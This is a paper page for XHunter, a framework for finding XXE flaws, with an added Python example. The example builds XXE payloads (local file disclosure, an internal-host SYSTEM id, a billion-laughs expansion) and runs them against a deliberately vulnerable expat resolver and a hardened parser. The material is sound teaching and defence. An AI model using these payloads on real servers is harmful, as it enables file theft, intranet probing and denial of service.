Abstract
XML External Entity (XXE) vulnerabilities are a severe web security threat: in the OWASP Top 10 (2017) list of the most serious web application security risks, XXE ranked fourth. Exploiting an XXE flaw can disclose sensitive files, cause denial of service through entity expansion, and let an attacker discover intranet assets by making the server dereference attacker-chosen URIs. The problem has received comparatively little research attention, and detecting these vulnerabilities still requires manual work. In this paper we present XHunter, a penetration-testing framework that discovers and exploits XXE vulnerabilities automatically. XHunter locates the call chain that reaches a vulnerable XML-parsing sink and determines the vulnerability's scope of influence; in doing so it addresses several challenges of analyzing modern web applications, such as object-oriented code structures. Beyond detecting vulnerable sinks, XHunter constructs the exploit path automatically and assigns each vulnerability a risk rating based on the potential impact of the exploit. We applied XHunter to 22 real-world web frameworks and found 8 previously unreported vulnerabilities, 2 of which have been assigned CVE IDs.
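The three impacts the abstract names (file disclosure, entity-expansion denial of service, and server-side requests to internal hosts) all come from the same sink: a parser that honours DTD entity declarations in untrusted input. The following is an illustrative example added for this page, not XHunter's code, built on Python's standard-library expat bindings. It runs an XXE-prone parse beside a hardened one; the secret file, the internal host `10.0.0.5:8080`, and the payloads are constructed here so that everything runs offline.

```python
"""Added example: an XXE-prone XML parse beside a hardened one, using
Python's standard-library expat bindings.  Not XHunter's code; the secret
file, internal host and payloads are constructed for an offline run."""
import os
import tempfile
import xml.parsers.expat as expat


class DoctypeRejected(Exception):
    """Raised by the hardened parser when untrusted XML carries a DOCTYPE."""


def parse_untrusted(doc, resolve_external):
    """Parse `doc`; return (character data, SYSTEM ids handed to the resolver).

    resolve_external=True models an application that lets the parser
    dereference SYSTEM identifiers: this is the XXE sink.  False installs
    the usual fix, refusing any DTD so that no entity can be declared.
    """
    parser = expat.ParserCreate()
    text, requested = [], []
    parser.CharacterDataHandler = text.append

    if resolve_external:
        def resolve(context, base, system_id, public_id):
            requested.append(system_id)            # value chosen by the attacker
            if os.path.isfile(system_id):          # local file disclosure
                child = parser.ExternalEntityParserCreate(context)
                with open(system_id, "rb") as fh:
                    child.Parse(fh.read(), True)   # entity body lands in `text`
            # http://host:port/ ids are recorded but not fetched (offline); a
            # resolver that did fetch them gives the attacker SSRF-style
            # intranet discovery, the third impact named in the abstract.
            return 1
        parser.ExternalEntityRefHandler = resolve
    else:
        def reject(name, system_id, public_id, has_internal_subset):
            raise DoctypeRejected("DOCTYPE is not allowed in untrusted XML")
        parser.StartDoctypeDeclHandler = reject

    parser.Parse(doc, True)
    return "".join(text), requested


def file_disclosure_payload(system_id):
    """Classic XXE payload: an external general entity referenced in content."""
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE order [<!ENTITY xxe SYSTEM "%s">]>\n'
            '<order><note>&xxe;</note></order>' % system_id)


def billion_laughs_payload(depth=3, fanout=10):
    """Nested internal entities: output grows as fanout**depth (DoS vector)."""
    decls = ['<!ENTITY lol0 "lol">']
    for i in range(1, depth + 1):
        decls.append('<!ENTITY lol%d "%s">' % (i, ("&lol%d;" % (i - 1)) * fanout))
    return '<!DOCTYPE r [%s]><r>&lol%d;</r>' % ("".join(decls), depth)


def demo():
    """Run the three attacks against the sink, then against the hardened parser."""
    with tempfile.NamedTemporaryFile("wb", suffix=".conf", delete=False) as fh:
        fh.write(b"db_password=hunter2\n")        # constructed secret
        secret = fh.name
    try:
        leaked, ids = parse_untrusted(file_disclosure_payload(secret), True)
        assert leaked == "db_password=hunter2\n" and ids == [secret]

        _, ids = parse_untrusted(file_disclosure_payload("http://10.0.0.5:8080/"), True)
        assert ids == ["http://10.0.0.5:8080/"]   # internal target reached the resolver

        expanded, _ = parse_untrusted(billion_laughs_payload(3, 10), True)
        assert len(expanded) == 3 * 10 ** 3        # a few hundred bytes of DTD -> 3000 bytes

        for payload in (file_disclosure_payload(secret), billion_laughs_payload()):
            try:
                parse_untrusted(payload, False)
            except DoctypeRejected:
                continue
            raise AssertionError("hardened parser accepted a DOCTYPE")
    finally:
        os.unlink(secret)
    return True


if __name__ == "__main__":
    print("all XXE checks behaved as expected:", demo())
```

The hardened branch refuses the DOCTYPE outright rather than trying to filter entity declarations, which is the mitigation that survives parser quirks; in production the same effect is reached with the parser's own switch, for example lxml's `XMLParser(resolve_entities=False, no_network=True)` or, in PHP before 8.0, `libxml_disable_entity_loader(true)`. Keeping the billion-laughs depth at 3 is deliberate: the real attack uses 9 or 10 levels, and modern expat caps amplification, so the example only demonstrates the growth rate.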
Acknowledgements
We would like to thank the anonymous reviewers for their valuable comments and helpful suggestions.
Copyright information
© 2021 ICST Institute for Computer Sciences, Social Informatics and Telecommunications Engineering
About this paper
Cite this paper
Wang, Z., Xie, W., Tao, J., Tang, Y., Wang, E. (2021). XHunter: Understanding XXE Vulnerability via Automatic Analysis. In: Garcia-Alfaro, J., Li, S., Poovendran, R., Debar, H., Yung, M. (eds) Security and Privacy in Communication Networks. SecureComm 2021. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol 399. Springer, Cham. https://doi.org/10.1007/978-3-030-90022-9_2
DOI: https://doi.org/10.1007/978-3-030-90022-9_2
Publisher Name: Springer, Cham
Print ISBN: 978-3-030-90021-2
Online ISBN: 978-3-030-90022-9